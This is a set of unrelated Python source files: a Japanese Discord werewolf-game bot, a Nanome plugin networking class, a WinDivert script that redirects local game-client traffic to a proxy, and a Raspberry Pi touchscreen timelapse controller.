await client.send_message(CHANNEL, '参加したい人は"/join"と入力。')
await client.send_message(CHANNEL, '全員の入力が終わったら"/go"と入力。')
STARTED = True
elif STARTED:
if message.content.startswith("/join"):
if client.user != message.author:
p = []
for player in players:
p.append(player.discord)
if message.author in p:
await client.send_message(CHANNEL, "{} はもう登録済みです。".format(message.author.name))
else:
hoge = Player(message.author)
players.append(hoge)
await client.send_message(CHANNEL, "{} を登録しました。".format(send.get()))
elif message.content.startswith("/go"):
if len(players)<3:
await client.send_message(CHANNEL, "3人以上いないとプレイできません。再度/startからやりなおしてください。")
else:
await client.send_message(CHANNEL, "全員の準備が完了しました。夜のアクションに入ります。\nアクションはDMで行います。")
deck = makeDeck(len(players))
playable, remaining = decideRole(deck)
for x, player in enumerate(players):
player.role = playable[x]
for player in players:
await client.send_message(player.discord, '{} のターンです。'.format(player.name))
act = Thread(target = player.action, args = (players,remaining,), name = "act")
act.start()
while True:
state = send.get()
if state[0] == "end":
await client.send_message(player.discord, state[1])
break
elif state[0] == "exc":
await client.send_message(player.discord, state[1])
else:
await client.send_message(player.discord, state[1])
message = await client.wait_for_message(author = player.discord)#, content=state[0])
receive.put(message.content)
players = swapThief(players)
await client.send_message(CHANNEL, '全員のアクションが完了したので、誰を処刑するか話し合いを始めてください。\n話し合いが終わったら"/ready"と入力。')
message = await client.wait_for_message(channel = CHANNEL, content = "/ready")
await client.send_message(CHANNEL, 'それでは、投票に入ります。\n投票もDMで行います。')
for player in players:
v = Thread(target = vote, args = (player, players, remaining,),name = "vote")
v.start()
while True:
state = send.get()
if state[0] == "end":
await client.send_message(player.discord, state[1])
break
elif state[0] == "exc":
await client.send_message(player.discord, state[1])
else:
await client.send_message(player.discord, state[1])
message = await client.wait_for_message(author = player.discord)
receive.put(message.content)
results = getVoteResult(players, playable)
await client.send_message(CHANNEL, '全員の投票が終わりました。')
await client.send_message(CHANNEL, send.get())
await client.send_message(CHANNEL, 'それでは、結果発表です。')
getres = Thread(target = getGameresult, args = (players, results, remaining,), name = "getres")
getres.start()
while True:
state = send.get()
if state[0] == "end":
await client.send_message(CHANNEL, state[1])
break
else:
await client.send_message(CHANNEL, state[1])
STARTED = False
players = []
#===== JinroGame =====#
class Player():
def __init__(self, discord):
self.role = ""
self.type = ""
self.thiefflag = False
self.thiefbuff = ""
self.discord = discord
self.name = self.discord.name
self.voted = 0
send.put(self.name)
def action(self, players, remaining):
if self.role == "fortune teller":
send.put(["/fortune", 'あなたは##### fortune teller #####です。\n\n占いをするか、残りの2枚のカードを見るか選択してください。\n1 占う\n2 カードを見る'])#\n\n返答は"/fortune [content]"のフォーマットで行ってください。'])
while True:
choice = receive.get()
if choice not in ["1", "2"]:
send.put(["exc", "入力が正しくありません。"])
else:
choice = int(choice)
break
if choice == 1:
list = []
sentence = "占いたい人の番号を入力してください。\n"
for i, player in enumerate(players):
if player.name == self.name:
None
else:
sentence += (str(i+1) + " " + player.name + "\n")
list.append(str(i+1))
send.put(["/fortune", sentence])
while True:
target = receive.get()
if target is None:
None
elif target in list:
target = int(target) - 1
send.put(["end", players[target].name + " を占ったところ、 " + players[target].role + " だとわかりました。\n\nこれであなたのアクションは完了しました。"])
break
else:
send.put(["exc", "入力が正しくありません。"])
elif choice == 2:
sentence = "残りの2枚のカードは、" + str(remaining) + "です。\n\nこれであなたのアクションは完了しました。"
send.put(["end", sentence])
elif self.role == "werewolf":
send.put(["/werewolf", "あなたは##### werewolf #####です。\n仲間を確認するため、カモフラージュも兼ねて何か適当に入力してください。\n"])
lonely = True
sentence = ""
for player in players:
if player.role == "werewolf":
if not player.name == self.name:
sentence += ("werewolf: " + player.name + "\n")
lonely = False
if lonely:
sentence = "仲間はいないようだ。\n"
hoge = receive.get()
sentence += "\nこれであなたのアクションは完了しました。"
send.put(["end", sentence])
elif self.role == "thief":
sentence = "あなたは##### thief #####です。\n役職を交換したいプレイヤーの番号を入力してください。\n"
list = []
for i, player in enumerate(players):
if player.name == self.name:
None
else:
sentence += (str(i+1) + " " + player.name + "\n")
list.append(str(i+1))
send.put(["/thief", sentence])
while True:
target = receive.get()
if target is None:
None
elif target in list:
target = int(target) - 1
newrole = players[target].role
players[target].thiefflag = True
self.thiefflag = True
self.thiefbuff = newrole
send.put(["end", players[target].name + " からカードを奪い、あなたは " + newrole + " になりました。\nこのことは相手には通知されません。\n\nこれであなたのアクションは完了しました。"])
break
else:
send.put(["exc", "入力が正しくありません。"])
elif self.role == "hangman":
send.put(["/hangman", "あなたは##### hangman #####です。\nやることはないので、カモフラージュのために何か適当に打ち込んでください。"])
hoge = receive.get()
send.put(["end", "\nこれであなたのアクションは完了しました。"])
elif self.role == "citizen":
send.put(["/citizen","あなたは##### citizen #####です。\nやることはないので、カモフラージュのために何か適当に打ち込んでください。"])
hoge = receive.get()
send.put(["end", "\nこれであなたのアクションは完了しました。"])
def killed(self, players, playable):  # returns which side wins if this player is executed
if self.role == "hangman":
return "hangman"
elif self.role == "werewolf":
return "citizen"
elif "werewolf" not in playable:
return "nobody"
else:
return "werewolf"
def makeDeck(num_player):
num_player = int(num_player)
deck = []
role = []
roles = config["roles{}".format(num_player)]
for i in roles:
role.append(i)
for i in role:
a = int(roles[i])
for j in range(a):
deck.append(i)
return deck
def decideRole(deck):
random.shuffle(deck)
playable = deck[:-2]
remaining = deck[-2:]
return playable, remaining
def swapThief(players):
for player in players:
if player.thiefflag == True:
if player.role == "thief":
player.role = player.thiefbuff
else:
player.role = "thief"
return players
def vote(player, players, playable):
sentence = player.name + " さんの投票です。\n投票したいプレイヤーの番号を入力してください。\n"
list = []
for x, i in enumerate(players):
if player.name != i.name:
sentence += (str(x+1) + " " + i.name + "\n")
list.append(str(x+1))
send.put(["/vote", sentence])
while True:
tar = receive.get()
if tar.isdigit() and tar in list:
players[int(tar)-1].voted += 1
send.put(["end", players[int(tar)-1].name+" に投票しました。"])
break
else:
send.put(["exc", "入力が正しくありません。"])
def getVoteResult(players, playable):
judge = []
names = []
most = players[0].voted
for player in players:
if player.voted == most:
judge.append(player)
names.append(player.name)
elif player.voted > most:
judge = []
names = []
judge.append(player)
names.append(player.name)
most = player.voted
if len(names) == len(players):
send.put("あなたたちは平和村を宣言しました。")
if "werewolf" in playable:
return ["werewolf"]
else:
return ["peaceful"]
send.put("投票の結果、処刑されるプレイヤーは " + str(names) + " です。")
results = []
for i in judge:
results.append(i.killed(players, playable))
return results
def judgement(players, playable):  # used when the execution is decided without a formal vote
sentence = "\nそれでは、処刑するプレイヤーの番号を入力してください。\n平和村だと思う場合は、0を入力してください。\n\n"
sentence += "0 平和村宣言\n"
choices = []
for i, player in enumerate(players):
sentence += (str(i+1) + " " + player.name + "\n")
choices.append(str(i+1))
while True:
judge = receive.get()
if judge is None:
None
elif judge == "0":
send.put(["end","あなたたちは平和村を宣言しました。"])
if "werewolf" not in playable:
return "peaceful"
else:
return "werewolf"
elif judge not in choices:
send.put(["exc", "入力が正しくありません。"])
else:
send.put(["end", players[int(judge)-1].name + " を処刑します。"])
result = players[int(judge)-1].killed(players, playable)
break
return result
def getGameresult(players, results, remaining):
sentence = ""
sleep(3)
if "hangman" in results:
send.put([" ", "### 吊り人 ### の勝利です。\n\n勝利プレイヤー\t役職"])
for player in players:
if player.role == "hangman":
sentence += (player.name + "\t" + player.role + "\n")
send.put([" ", sentence])
elif "citizen" in results:
send.put([" ", "### 市民チーム ### の勝利です。\n\n勝利プレイヤー\t役職"])
for player in players:
if player.role not in ["hangman", "werewolf"]:
sentence += (player.name + "\t" + player.role + "\n")
send.put([" ", sentence])
elif "werewolf" in results:
send.put([" ", "### 人狼チーム ### の勝利です。\n\n勝利プレイヤー\t役職"])
for player in players:
if player.role == "werewolf":
sentence += (player.name + "\t" + player.role + "\n")
send.put([" ", sentence])
elif "peaceful" in results:
send.put([" ", "### 平和村 ### でした。\n"])
elif "nobody" in results:
send.put([" ", "### 勝者なし ###\n"])
sentence = "\n\n各プレイヤーの役職は以下の通りでした。\n"
for i, player in enumerate(players):
sentence += (player.name + "\t" + player.role + "\n")
sentence += ("\nそして、残っていた2枚のカードは" + str(remaining) + "でした。\n\nお疲れさまでした。")
send.put(["end", sentence])
#===== main =====#
def main():
client.run(config["BOT"]["TOKEN"])
if __name__ == "__main__":
main()
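# Illustrative option.ini layout, inferred from the keys read above (values are
# placeholders; each "rolesN" section must list two more cards than there are
# players, since decideRole sets the last two aside):
#   [BOT]
#   TOKEN = <discord bot token>
#   CHANNEL = <discord channel id>
#
#   [roles3]
#   werewolf = 2
#   fortune teller = 1
#   thief = 1
#   citizen = 1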
|
_plugin.py
|
from . import _PluginInstance
from nanome._internal import _network as Network
from nanome._internal._process import _ProcessManager, _LogsManager
from nanome._internal._network._serialization._serializer import Serializer
from nanome._internal._util._serializers import _TypeSerializer
from nanome.util.logs import Logs
from nanome.util import config
from multiprocessing import Process, Pipe, current_process
from timeit import default_timer as timer
import sys
import json
import cProfile
import time
import os
import fnmatch
import subprocess
import signal
try_reconnection_time = 20.0
keep_alive_time_interval = 60.0
__metaclass__ = type
class _Plugin(object):
__serializer = Serializer()
_plugin_id = -1
_custom_data = None
def __parse_args(self):
Logs._set_verbose(False)
for i in range(1, len(sys.argv)):
if sys.argv[i] == "-h":
Logs.message("Usage:", sys.argv[1],"[-h] [-a ADDRESS] [-p PORT]")
Logs.message(" -h display this help")
Logs.message(" -a connects to a NTS at the specified IP address")
Logs.message(" -p connects to a NTS at the specified port")
Logs.message(" -k specifies a key file to use to connect to NTS")
Logs.message(" -n name to display for this plugin in Nanome")
Logs.message(" -v enable verbose mode, to display Logs.debug")
Logs.message(" -r, --auto-reload restart plugin automatically if a .py or .json file in current directory changes")
Logs.message(" --ignore to use with auto-reload. All paths matching this pattern will be ignored, " \
"use commas to specify several. Supports */?/[seq]/[!seq]")
sys.exit(0)
elif sys.argv[i] == "-a":
if i + 1 >= len(sys.argv):
Logs.error("Error: -a requires an argument")
sys.exit(1)
self.__host = sys.argv[i + 1]
i += 1
elif sys.argv[i] == "-p":
if i + 1 >= len(sys.argv):
Logs.error("Error: -p requires an argument")
sys.exit(1)
try:
self.__port = int(sys.argv[i + 1])
except ValueError:
Logs.error("Error: -p argument has to be an integer")
sys.exit(1)
i += 1
elif sys.argv[i] == "-k":
if i + 1 >= len(sys.argv):
Logs.error("Error: -k requires an argument")
sys.exit(1)
self.__key_file = sys.argv[i + 1]
i += 1
elif sys.argv[i] == "-n":
if i + 1 >= len(sys.argv):
Logs.error("Error: -n requires an argument")
sys.exit(1)
self._description['name'] = sys.argv[i + 1]
i += 1
elif sys.argv[i] == "-v":
self.__has_verbose = True
Logs._set_verbose(True)
elif sys.argv[i] == "-r" or sys.argv[i] == "--auto-reload":
self.__has_autoreload = True
elif sys.argv[i] == "--ignore":
if i + 1 >= len(sys.argv):
Logs.error("Error: --ignore requires an argument")
sys.exit(1)
split = sys.argv[i + 1].split(",")
self.__to_ignore.extend(split)
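# Example invocation handled by __parse_args above (illustrative script name
# and values):
#   python my_plugin.py -a nts.example.org -p 8888 -k nts.key -n "My Plugin" -v --auto-reload --ignore "*.log,tmp/*"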
def __read_key_file(self):
try:
f = open(self.__key_file, "r")
key = f.read()
return key
except:
return None
def _on_packet_received(self, packet):
if packet.packet_type == Network._Packet.packet_type_message_to_plugin:
session_id = packet.session_id
if session_id in self._sessions:
# packet.decompress()
self._sessions[session_id]._on_packet_received(packet.payload)
return
# If we don't know this session_id, try to register it first
if _Plugin.__serializer.try_register_session(packet.payload) == True:
received_version_table, _, _ = _Plugin.__serializer.deserialize_command(packet.payload, None)
version_table = _TypeSerializer.get_best_version_table(received_version_table)
self.__on_client_connection(session_id, version_table)
# Doesn't register? It's an error
else:
Logs.warning("Received a command from an unregistered session", session_id)
elif packet.packet_type == Network._Packet.packet_type_plugin_connection:
_Plugin._plugin_id = packet.plugin_id
Logs.message("Registered with plugin ID", _Plugin._plugin_id, "\n=======================================\n")
elif packet.packet_type == Network._Packet.packet_type_plugin_disconnection:
if _Plugin._plugin_id == -1:
if self._description['auth'] == None:
Logs.error("Connection refused by NTS. Are you missing a security key file?")
else:
Logs.error("Connection refused by NTS. Your security key file might be invalid")
sys.exit(1)
else:
Logs.debug("Connection ended by NTS")
sys.exit(0)
elif packet.packet_type == Network._Packet.packet_type_client_disconnection:
try:
id = packet.session_id
self._sessions[id].signal_and_close_pipes()
del self._sessions[id]
Logs.debug("Session", id, "disconnected")
except:
pass
elif packet.packet_type == Network._Packet.packet_type_keep_alive:
pass
else:
Logs.warning("Received a packet of unknown type", packet.packet_type, ". Ignoring")
def __file_filter(self, name):
return name.endswith(".py") or name.endswith(".json")
def __file_times(self, path):
found_file = False
for root, dirs, files in os.walk(path):
for file in filter(self.__file_filter, files):
file_path = os.path.join(root, file)
matched = False
for pattern in self.__to_ignore:
if fnmatch.fnmatch(file_path, pattern):
matched = True
if matched == False:
found_file = True
yield os.stat(file_path).st_mtime
if found_file == False:
yield 0.0
def __autoreload(self):
wait = 3
if os.name == "nt":
sub_kwargs = { 'creationflags': subprocess.CREATE_NEW_PROCESS_GROUP }
break_signal = signal.CTRL_BREAK_EVENT
else:
sub_kwargs = {}
break_signal = signal.SIGTERM
sub_args = [x for x in sys.argv if x != '-r' and x != "--auto-reload"]
try:
sub_args = [sys.executable] + sub_args
process = subprocess.Popen(sub_args, **sub_kwargs)
except:
Logs.error("Couldn't find a suitable python executable")
sys.exit(1)
last_mtime = max(self.__file_times("."))
while True:
try:
max_mtime = max(self.__file_times("."))
if max_mtime > last_mtime:
last_mtime = max_mtime
Logs.message("Restarting plugin")
process.send_signal(break_signal)
process = subprocess.Popen(sub_args, **sub_kwargs)
time.sleep(wait)
except KeyboardInterrupt:
process.send_signal(break_signal)
break
def __run(self):
if os.name == "nt":
signal.signal(signal.SIGBREAK, self.__on_termination_signal)
else:
signal.signal(signal.SIGTERM, self.__on_termination_signal)
if self._pre_run != None:
self._pre_run()
_Plugin.instance = self
self._description['auth'] = self.__read_key_file()
self._process_manager = _ProcessManager()
self._logs_manager = _LogsManager(self._plugin_class.__name__ + ".log")
self.__connect()
self.__loop()
def __connect(self):
self._network = Network._NetInstance(self, _Plugin._on_packet_received)
if self._network.connect(self.__host, self.__port):
if _Plugin._plugin_id >= 0:
plugin_id = _Plugin._plugin_id
else:
plugin_id = 0
packet = Network._Packet()
packet.set(0, Network._Packet.packet_type_plugin_connection, plugin_id)
packet.write_string(json.dumps(self._description))
self._network.send(packet)
self.__connected = True
self.__last_keep_alive = timer()
return True
else:
self.__disconnection_time = timer()
return False
def __loop(self):
to_remove = []
try:
while True:
if self.__connected == False:
elapsed = timer() - self.__disconnection_time
if elapsed >= try_reconnection_time:
Logs.message("Trying to reconnect...")
if self.__connect() == False:
self.__disconnection_time = timer()
continue
else:
time.sleep(try_reconnection_time - elapsed)
continue
if self._network.receive() == False:
self.__connected = False
self.__disconnect()
continue
if timer() - self.__last_keep_alive >= keep_alive_time_interval:
self.__last_keep_alive = timer()
packet = Network._Packet()
packet.set(_Plugin._plugin_id, Network._Packet.packet_type_keep_alive, 0)
self._network.send(packet)
del to_remove[:]
for id, session in self._sessions.items():
if session._read_from_plugin() == False:
session.close_pipes()
to_remove.append(id)
for id in to_remove:
self._sessions[id]._send_disconnection_message(_Plugin._plugin_id)
del self._sessions[id]
self._process_manager._update()
self._logs_manager._update()
except KeyboardInterrupt:
self.__exit()
def __disconnect(self):
to_remove = []
for id in self._sessions.keys():
to_remove.append(id)
for id in to_remove:
del self._sessions[id]
self.__disconnection_time = timer()
def __on_termination_signal(self, signum, frame):
self.__exit()
def __exit(self):
Logs.debug('Exiting')
for session in _Plugin.instance._sessions.values():
session.signal_and_close_pipes()
session.plugin_process.join()
if self._post_run != None:
self._post_run()
sys.exit(0)
def __on_client_connection(self, session_id, version_table):
main_conn_net, process_conn_net = Pipe()
main_conn_proc, process_conn_proc = Pipe()
session = Network._Session(session_id, self._network, self._process_manager, self._logs_manager, main_conn_net, main_conn_proc)
process = Process(target=_Plugin._launch_plugin, args=(self._plugin_class, session_id, process_conn_net, process_conn_proc, _Plugin.__serializer, _Plugin._plugin_id, version_table, _TypeSerializer.get_version_table(), Logs._is_verbose(), _Plugin._custom_data))
process.start()
session.plugin_process = process
self._sessions[session_id] = session
Logs.debug("Registered new session:", session_id)
@staticmethod
def _is_process():
return current_process().name != 'MainProcess'
@classmethod
def _launch_plugin_profile(cls, plugin_class, session_id, pipe_net, pipe_proc, serializer, plugin_id, version_table, original_version_table, verbose, custom_data):
cProfile.runctx('_Plugin._launch_plugin(plugin_class, session_id, pipe_net, pipe_proc, serializer, plugin_id, version_table, original_version_table, verbose, custom_data)', globals(), locals(), 'profile.out')
@classmethod
def _launch_plugin(cls, plugin_class, session_id, pipe_net, pipe_proc, serializer, plugin_id, version_table, original_version_table, verbose, custom_data):
plugin = plugin_class()
_PluginInstance.__init__(plugin, session_id, pipe_net, pipe_proc, serializer, plugin_id, version_table, original_version_table, verbose, custom_data)
Logs.debug("Starting plugin")
plugin._run()
def __init__(self, name, description, category = "", has_advanced = False):
self._sessions = dict()
self._description = {
'name': name,
'description': description,
'category': category,
'hasAdvanced': has_advanced,
'auth': None
}
self._plugin_class = None
self.__connected = False
self.__has_autoreload = False
self.__has_verbose = False
self.__to_ignore = []
self._pre_run = None
self._post_run = None
|
redirect.py
|
import logging
import threading
import time
import pydivert
class Redirect:
def __init__(self, server_host, server_port, proxy_host, proxy_port):
self.client_host = None
self.client_port = 0
self.server_host = server_host
self.server_port = server_port
self.proxy_host = proxy_host
self.proxy_port = proxy_port
def handle(self):
"""
Redirect local outbound packets destined for server_host:server_port to proxy_host:proxy_port.
Packets sent by the proxy to the client should appear as if they are directly sent from the server,
i.e. the proxy is invisible to the client.
"""
# Reflect [client -> server] into [client -> proxy]
threading.Thread(target=self.reflect_client_to_server).start()
while not self.client_host:
time.sleep(0.05)  # avoid busy-waiting until the first client packet reveals the client address
# Reflect [proxy -> client] into [server -> client]
threading.Thread(target=self.reflect_proxy_to_client).start()
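# Packet flow implemented by the two reflectors below:
#   outbound  client -> server_host:server_port   becomes  client -> proxy_host:proxy_port
#   outbound  proxy  -> client_host:client_port   becomes  server_host:server_port -> client
# Each rewritten packet is re-injected with direction set to INBOUND so the
# local stack accepts it as traffic arriving from the network instead of
# looping it back through this diverter.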
def reflect_client_to_server(self):
"""
Reflect packets from [client -> server] into [client -> proxy].
"""
packet_filter = f"tcp and outbound and" \
f" (ip.DstAddr == {self.server_host} and tcp.DstPort == {self.server_port}" \
f" and (ip.SrcAddr != {self.proxy_host} or tcp.SrcPort != {self.proxy_port}))"
with pydivert.WinDivert(filter=packet_filter) as w:
logging.info(f"[*] Ready to reflect [client -> {self.server_host}:{self.server_port}] packets.")
for packet in w:
self.client_port = packet.src_port
self.client_host = packet.src_addr
packet.dst_addr = self.proxy_host
packet.dst_port = self.proxy_port
packet.direction = pydivert.Direction.INBOUND
w.send(packet)
def reflect_proxy_to_client(self):
"""
Reflect packets from [proxy -> client] into [server -> client].
"""
packet_filter = f"tcp and outbound and" \
f" (ip.DstAddr == {self.client_host} and tcp.DstPort == {self.client_port}" \
f" and ip.SrcAddr == {self.proxy_host} or tcp.SrcPort == {self.proxy_port})"
with pydivert.WinDivert(filter=packet_filter) as w:
logging.info("[*] Ready to reflect [proxy -> client] packets.")
for packet in w:
packet.src_addr = self.server_host
packet.src_port = self.server_port
packet.direction = pydivert.Direction.INBOUND
w.send(packet)
if __name__ == '__main__':
from main import TENHOU_HOST, TENHOU_PORT, WSS_PROXY_HOST, WSS_PROXY_PORT
for host in TENHOU_HOST:
redirect = Redirect(host, TENHOU_PORT, WSS_PROXY_HOST, WSS_PROXY_PORT)
redirect_thread = threading.Thread(target=redirect.handle)
redirect_thread.start()
|
lapse.py
|
#!/usr/bin/python
# Lapse-Pi timelapse controller for Raspberry Pi
# This must run as root (sudo python lapse.py) due to framebuffer, etc.
#
# http://www.adafruit.com/products/998 (Raspberry Pi Model B)
# http://www.adafruit.com/products/1601 (PiTFT Mini Kit)
#
# Prerequisite tutorials: aside from the basic Raspbian setup and PiTFT setup
# http://learn.adafruit.com/adafruit-pitft-28-inch-resistive-touchscreen-display-raspberry-pi
#
# lapse.py by David Hunt (dave@davidhunt.ie)
# based on cam.py by Phil Burgess / Paint Your Dragon for Adafruit Industries.
# BSD license, all text above must be included in any redistribution.
import cPickle
import fnmatch
import os
import pygame
import threading
from pygame.locals import FULLSCREEN, MOUSEBUTTONDOWN, MOUSEBUTTONUP
from time import sleep
from datetime import datetime, timedelta
# UI classes ---------------------------------------------------------------
# Icon is a very simple bitmap class, just associates a name and a pygame
# image (PNG loaded from icons directory) for each.
# There isn't a globally-declared fixed list of Icons. Instead, the list
# is populated at runtime from the contents of the 'icons' directory.
class Icon:
def __init__(self, name):
self.name = name
try:
self.bitmap = pygame.image.load(iconPath + '/' + name + '.png')
except:
pass
# Button is a simple tappable screen region. Each has:
# - bounding rect ((X,Y,W,H) in pixels)
# - optional background color and/or Icon (or None), always centered
# - optional foreground Icon, always centered
# - optional single callback function
# - optional single value passed to callback
# Occasionally Buttons are used as a convenience for positioning Icons
# but the taps are ignored. Stacking order is important; when Buttons
# overlap, lowest/first Button in list takes precedence when processing
# input, and highest/last Button is drawn atop prior Button(s). This is
# used, for example, to center an Icon by creating a passive Button the
# width of the full screen, but with other buttons left or right that
# may take input precedence (e.g. the Effect labels & buttons).
# After Icons are loaded at runtime, a pass is made through the global
# buttons[] list to assign the Icon objects (from names) to each Button.
class Button:
def __init__(self, rect, **kwargs):
self.rect = rect # Bounds
self.color = None # Background fill color, if any
self.iconBg = None # Background Icon (atop color fill)
self.iconFg = None # Foreground Icon (atop background)
self.bg = None # Background Icon name
self.fg = None # Foreground Icon name
self.callback = None # Callback function
self.value = None # Value passed to callback
for key, value in kwargs.iteritems():
if key == 'color': self.color = value
elif key == 'bg' : self.bg = value
elif key == 'fg' : self.fg = value
elif key == 'cb' : self.callback = value
elif key == 'value': self.value = value
def selected(self, pos):
x1 = self.rect[0]
y1 = self.rect[1]
x2 = x1 + self.rect[2] - 1
y2 = y1 + self.rect[3] - 1
if ((pos[0] >= x1) and (pos[0] <= x2) and
(pos[1] >= y1) and (pos[1] <= y2)):
if self.callback:
if self.value is None:
self.callback()
else:
self.callback(self.value)
return True
return False
def draw(self, screen):
if self.color:
screen.fill(self.color, self.rect)
if self.iconBg:
screen.blit(self.iconBg.bitmap,
(self.rect[0]+(self.rect[2]-self.iconBg.bitmap.get_width())/2,
self.rect[1]+(self.rect[3]-self.iconBg.bitmap.get_height())/2))
if self.iconFg:
screen.blit(self.iconFg.bitmap,
(self.rect[0]+(self.rect[2]-self.iconFg.bitmap.get_width())/2,
self.rect[1]+(self.rect[3]-self.iconFg.bitmap.get_height())/2))
def setBg(self, name):
if name is None:
self.iconBg = None
else:
for i in icons:
if name == i.name:
self.iconBg = i
break
def numericCallback(n): # Numeric keypad: 0-9 append a digit, 10 = delete, 11 = cancel, 12 = OK
global screenMode
global numberstring
if n < 10:
numberstring = numberstring + str(n)
elif n == 10:
numberstring = numberstring[:-1]
elif n == 11:
screenMode = 1
elif n == 12:
screenMode = returnScreen
numeric = int(numberstring)
v[dict_idx] = numeric
def settingCallback(n): # Pass 1 (next setting) or -1 (prev setting)
global screenMode
screenMode += n
if screenMode < 1: screenMode = len(buttons) - 1
elif screenMode >= len(buttons): screenMode = 1
def valuesCallback(n): # Settings screen: -1 = save & exit, 2 = edit Interval, 3 = edit Images
global screenMode
global returnScreen
global numberstring
global numeric
global v
global dict_idx
if n == -1:
screenMode = 0
saveSettings()
elif n == 2:
dict_idx='Interval'
numberstring = str(v[dict_idx])
screenMode = 2
returnScreen = 1
elif n == 3:
dict_idx='Images'
numberstring = str(v[dict_idx])
screenMode = 2
returnScreen = 1
def viewCallback(n): # Viewfinder buttons
global screenMode, screenModePrior
if n == 0: # Gear icon
screenMode = 1
def doneCallback(): # Exit settings
global screenMode
if screenMode > 0:
saveSettings()
screenMode = 0 # Switch back to main window
def startCallback(n): # start/Stop the timelapse thread
global t, busy, threadExited
global currentframe
if n == 1:
if busy == False:
if (threadExited == True):
# Re-instantiate the thread object for the next start
t = threading.Thread(target=timeLapse)
threadExited = False
t.start()
if n == 0:
if busy == True:
busy = False
t.join()
currentframe = 0
# Re-instantiate the thread object for the next time around.
t = threading.Thread(target=timeLapse)
def quitCallback(): # Quit confirmation button
raise SystemExit
def offCallback(): # Turn Off Rasp
os.system("sudo halt")
raise SystemExit
def render_video(photos_dir):
global rendering
rendering = True
os.system(
"avconv -f image2 -i " + photos_dir + "/" + "%07d.jpg -r 12 -s 1920x1080 " + photos_dir + "/" + "timelapse.mp4")
rendering = False
def timeLapse():
global v
global settling_time
global rendering
global busy, threadExited, r
global currentframe
global error
busy = True
photos_dir = os.path.join("/home/pi/timelapse/", datetime.now().strftime('%d-%m-%Y\ %H:%M'))
os.system("sudo mkdir " + photos_dir)
for frame in range( 1 , v['Images'] + 1 ):
if not busy:
break
currentframe = frame
filename = str(frame).zfill(7) + ".jpg"
os.system("fswebcam -d /dev/video0 -r 1920x1080 --no-banner " + photos_dir + "/" + filename)
sleep(settling_time)
print("Rendering")
r = threading.Thread(target=render_video, args=(photos_dir,))
r.start()
r.join()
currentframe = 0
busy = False
threadExited = True
# Global stuff -------------------------------------------------------------
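# Worker threads: t runs the capture loop (timeLapse), r renders the video; each is re-created before it is (re)started.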
t = threading.Thread(target=timeLapse)
r = threading.Thread(target=render_video)
busy = False
threadExited = False
rendering = False
screenMode = 0 # Current screen mode; default = viewfinder
screenModePrior = -1 # Prior screen mode (for detecting changes)
iconPath = 'icons' # Subdirectory containing UI bitmaps (PNG format)
numeric = 0 # number from numeric keypad
numberstring = "0"
returnScreen = 0
currentframe = 0
settling_time = 2.3
interval_delay = 0.2
dict_idx = "Interval"
v = {
"Interval": 3000,
"Images": 150}
error = ''
icons = [] # This list gets populated at startup
# buttons[] is a list of lists; each top-level list element corresponds
# to one screen mode (e.g. viewfinder, image playback, storage settings),
# and each element within those lists corresponds to one UI button.
# There's a little bit of repetition (e.g. prev/next buttons are
# declared for each settings screen, rather than a single reusable
# set); trying to reuse those few elements just made for an ugly
# tangle of code elsewhere.
buttons = [
# Screen mode 0 is main view screen of current status
[Button(( 5,180,60, 60), bg='start', cb=startCallback, value=1),
Button(( 77,180,60, 60), bg='cog', cb=viewCallback, value=0),
Button((150,180,60, 60), bg='stop', cb=startCallback, value=0),
# Button((223,180,60, 60), bg='quit', cb=quitCallback),
# Button((296,180,60, 60), bg='off', cb=offCallback)],
Button((223,180,60, 60), bg='off', cb=offCallback)],
# Screen 1 for changing values and setting motor direction
# [Button((260, 0, 60, 60), bg='cog', cb=valuesCallback, value=1),
[Button((260, 60, 60, 60), bg='cog', cb=valuesCallback, value=2),
Button((260,120, 60, 60), bg='cog', cb=valuesCallback, value=3),
Button(( 0,180,160, 60), bg='ok', cb=valuesCallback, value=-1),],
# Screen 2 for numeric input
[Button(( 0, 0,320, 60), bg='box'),
Button((180,120, 60, 60), bg='0', cb=numericCallback, value=0),
Button(( 0,180, 60, 60), bg='1', cb=numericCallback, value=1),
Button((120,180, 60, 60), bg='3', cb=numericCallback, value=3),
Button(( 60,180, 60, 60), bg='2', cb=numericCallback, value=2),
Button(( 0,120, 60, 60), bg='4', cb=numericCallback, value=4),
Button(( 60,120, 60, 60), bg='5', cb=numericCallback, value=5),
Button((120,120, 60, 60), bg='6', cb=numericCallback, value=6),
Button(( 0, 60, 60, 60), bg='7', cb=numericCallback, value=7),
Button(( 60, 60, 60, 60), bg='8', cb=numericCallback, value=8),
Button((120, 60, 60, 60), bg='9', cb=numericCallback, value=9),
Button((240,120, 80, 60), bg='del', cb=numericCallback, value=10),
Button((180,180,140, 60), bg='ok', cb=numericCallback, value=12),
Button((180, 60,140, 60), bg='cancel',cb=numericCallback, value=11)]
]
# Assorted utility functions -----------------------------------------------
def saveSettings():
global v
try:
outfile = open('lapse.pkl', 'wb')
# Use a dictionary (rather than pickling 'raw' values) so
# the number & order of things can change without breaking.
cPickle.dump(v, outfile)
outfile.close()
except Exception:
pass # keep the current in-memory settings if the file cannot be written
def loadSettings():
global v
try:
infile = open('lapse.pkl', 'rb')
v = cPickle.load(infile)
infile.close()
except Exception:
pass # no saved settings file yet; keep the defaults defined above
# Initialization -----------------------------------------------------------
# Init framebuffer/touchscreen environment variables
os.putenv('SDL_VIDEODRIVER', 'fbcon')
# Init pygame and screen
print ("Initting...")
pygame.init()
print("Setting fullscreen...")
modes = pygame.display.list_modes(16)
screen = pygame.display.set_mode(modes[0], FULLSCREEN, 16)
print ("Loading Icons...")
# Load all icons at startup.
for file in os.listdir(iconPath):
if fnmatch.fnmatch(file, '*.png'):
icons.append(Icon(file.split('.')[0]))
# Assign Icons to Buttons, now that they're loaded
print("Assigning Buttons")
for s in buttons: # For each screenful of buttons...
for b in s: # For each button on screen...
for i in icons: # For each icon...
if b.bg == i.name: # Compare names; match?
b.iconBg = i # Assign Icon to Button
b.bg = None # Name no longer used; allow garbage collection
if b.fg == i.name:
b.iconFg = i
b.fg = None
print("Load Settings")
loadSettings() # Must come last; fiddles with Button/Icon states
print("loading background..")
img = pygame.image.load("icons/LapsePi_hi.png")
if img is None or img.get_height() < 240: # Letterbox, clear background
screen.fill(0)
if img:
screen.blit(img,
((480 - img.get_width() ) / 2,
(320 - img.get_height()) / 2))
pygame.display.update()
sleep(2)
# Main loop ----------------------------------------------------------------
print("mainloop..")
while(True):
# Process touchscreen input
while True:
for event in pygame.event.get():
if event.type == MOUSEBUTTONDOWN:
pos = pygame.mouse.get_pos()
for b in buttons[screenMode]:
if b.selected(pos): break
